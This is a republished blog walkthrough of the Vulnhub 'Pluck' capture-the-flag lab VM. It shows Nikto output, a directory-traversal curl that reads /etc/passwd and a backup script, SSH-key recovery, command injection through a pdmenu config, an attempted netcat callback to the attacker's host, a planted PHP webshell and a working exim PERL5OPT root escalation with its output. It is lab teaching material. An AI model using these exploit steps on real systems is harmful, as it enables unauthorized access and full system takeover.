Vulnhub.com — Pluck VM Walkthrough

Datetime:2017-04-11 05:55:32         Topic: Apache HTTP Server          Share        Original >>
Here to See The Original Article!!!

Vulnhub.com — Pluck VM Walkthrough

What the Pluck!?

If you want to play along Pluck can be found here:

https://www.vulnhub.com/entry/pluck-1,178/

The usual arp-scan entry point to find our host.

The obligatory nmap giving us 4 ports to consider.

Let’s start with Nikto’ing the web server

- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2017–03–11 12:48:00 (GMT-5)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting…
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017–03–11 12:48:19 (GMT-5) (19 seconds)

So we have a reasonably juicy directory traversal to play with. Lets see what we can do with it.

HTTP landing page

So we can get at /etc/passwd and see all those lovely, lovely creds.

Yum!

And of specific interest is this little beauty, a backup script!

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Lets curl that bad boy, and we get a backup location!

root@kali:~/Desktop/pluck# curl http://192.168.56.101/index.php?page=/usr/local/scripts/backup.sh"
--snip--
########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo “Backing up data”
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo “Backup complete”
</div><br> <hr>
<div class=”row”>
<div class=”col-sm-12">
<footer>
<p>© Copyright 2017 Pluck</p>
</footer>
</div>
</div>
</div>
</body>
</html>

Now I got stuck here for a fair while for stupid STUPID reasons. I thought that the download kept failing.

It turns out it wasn’t and I just hadn’t ls’ed to see it sat there waiting for me! Grrrrrrrr. Unzipping it we see a few directories (Var, ome and home)

root@kali:~/Desktop/pluck# ls
index.php?page=%2Fbackups%2Fbackup.tar log passwd.txt rubber-duck.jpg users.txt
root@kali:~/Desktop/pluck# tar -xf index.php\?page\=%2Fbackups%2Fbackup.tar
tar: This does not look like a tar archive
tar: Skipping to next header
tar: Skipping to next header
8< ------------------------------- SNIP
root@kali:~/Desktop/pluck# ls
home index.php?page=%2Fbackups%2Fbackup.tar log ome passwd.txt rubber-duck.jpg users.txt var
root@kali:~/Desktop/pluck# cd home/
root@kali:~/Desktop/pluck/home# ls
bob paul peter

Recursive searching and we see some things of interest.

root@kali:~/Desktop/pluck/home# ls -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 .
drwxr-xr-x 5 root root 4.0K Mar 15 15:28 ..
drwxr-xr-x 2 1000 1000 4.0K Jan 18 07:43 bob
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 paul
drwxr-xr-x 2 1001 1001 4.0K Jan 18 03:04 peter
./bob:
total 20K
drwxr-xr-x 2 1000 1000 4.0K Jan 18 07:43 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r — r — 1 1000 1000 220 Jan 18 00:39 .bash_logout
-rw-r — r — 1 1000 1000 3.7K Jan 18 00:39 .bashrc
-rw-r — r — 1 1000 1000 655 Jan 18 00:39 .profile
-rw-r — r — 1 1000 1000 0 Jan 18 03:40 .sudo_as_admin_successful
./paul:
total 24K
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r — r — 1 1002 1002 220 Jan 18 03:04 .bash_logout
-rw-r — r — 1 1002 1002 3.7K Jan 18 03:04 .bashrc
drwxrwxr-x 2 1002 1002 4.0K Jan 18 13:09 keys
-rw-r — r — 1 1002 1002 655 Jan 18 03:04 .profile
./paul/keys:
total 56K
drwxrwxr-x 2 1002 1002 4.0K Jan 18 13:09 .
drwxr-xr-x 3 1002 1002 4.0K Jan 18 13:13 ..
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key1
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key1.pub
-rwxrwxr-x 1 1002 1002 672 Jan 18 13:08 id_key2
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key2.pub
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key3
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key3.pub
-rwxrwxr-x 1 1002 1002 1.7K Jan 18 13:09 id_key4
-rwxrwxr-x 1 1002 1002 392 Jan 18 13:09 id_key4.pub
-rwxrwxr-x 1 1002 1002 668 Jan 18 13:08 id_key5
-rwxrwxr-x 1 1002 1002 600 Jan 18 13:08 id_key5.pub
-rwxrwxr-x 1 1002 1002 1.7K Jan 18 13:09 id_key6
-rwxrwxr-x 1 1002 1002 392 Jan 18 13:09 id_key6.pub
./peter:
total 20K
drwxr-xr-x 2 1001 1001 4.0K Jan 18 03:04 .
drwxr-xr-x 5 root root 4.0K Jan 18 03:27 ..
-rw-r — r — 1 1001 1001 220 Jan 18 03:04 .bash_logout
-rw-r — r — 1 1001 1001 3.7K Jan 18 03:04 .bashrc
-rw-r — r — 1 1001 1001 655 Jan 18 03:04 .profile

A bash loop to investigate what the files are and it appears to be a range of SSH keys of varying types.

Trying each one in turn…

Until eventually we hit: PDMenu

Using the above documentation I went to the menu file (/home/paul/.pdmenurc)

And added in a netcat command back to my attacking host.

Didn’t bloody work though, did it?

So next I used the edit file option to drop a php webshell in a writable location, genius!

It didn’t have executable permissions though! Lets add that into the menu too! More genius!

Run it and check the file's permissions.

and………….. That didn’t work either. (I won’t bored you with a screen of NC not receiving a connection!)

So I spent quite a while fiddling around with webshells and nc and getting nowhere. I tried various shell escapes out of VIM. Then in a third stroke of genius (After staring at .pdmenurc for agggggges) I wondered if chaining commands in file edit options would let me in…. passing it the id command

and after dropping out of vim… it ran! w00p.

So repeating the steps but passing /bin/bash and it drops me into a low priv shell (Good times).

Checking for file that run as the owner and not the user who started it (as part of the amazing resource that is G0tM1lk’s linux escalation post ) I see exim. I’ve come across, and exploited this before, so this was bit was trivial.

If you want to look it up on exploit-db it’s this one:

And this is how it is used: (Note this is changed from the PoC on exDB to point at a location that exists on this filesystem. In this case /usr/exim/bin/exim )

paul@pluck:/usr/exim/bin$ PERL5OPT="-d/dev/null" /usr/exim/bin/exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.49
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated. Use q to quit or R to restart,
use o inhibit_exit to avoid stopping after program termination,
h q, h R or h o to get additional info.
DB<1> p system("id");
uid=0(root) gid=1002(paul) groups=1002(paul)
0
DB<2> p system("nc -nv 192.168.56.103");
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
256
DB<3> p system("/bin/bash");
root@pluck:/usr/exim/bin# id
uid=0(root) gid=1002(paul) groups=1002(paul)
root@pluck:/usr/exim/bin# whoami
root
root@pluck:/usr/exim/bin# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt

Congratulations you found the flag

---------------------------------------

###### ((((((((((((((((((((((((((((((
######### (((((((((((((((((((((((((((
,,########## ((((((((((((((((((((((((
@@,,,########## (((((((((((((((((((((
@@@@@,,,##########
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########
@@@,,,########## &&&&&&&&&&&&&&&&&&&&
,,,########## &&&&&&&&&&&&&&&&&&&&&&&
########## &&&&&&&&&&&&&&&&&&&&&&&&&&
####### &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

As you can see I also tried to nc out (because I couldn’t get that to work using the local file include/dir traversal with a php webshell, apparently that's due to this being the openbsd package).








New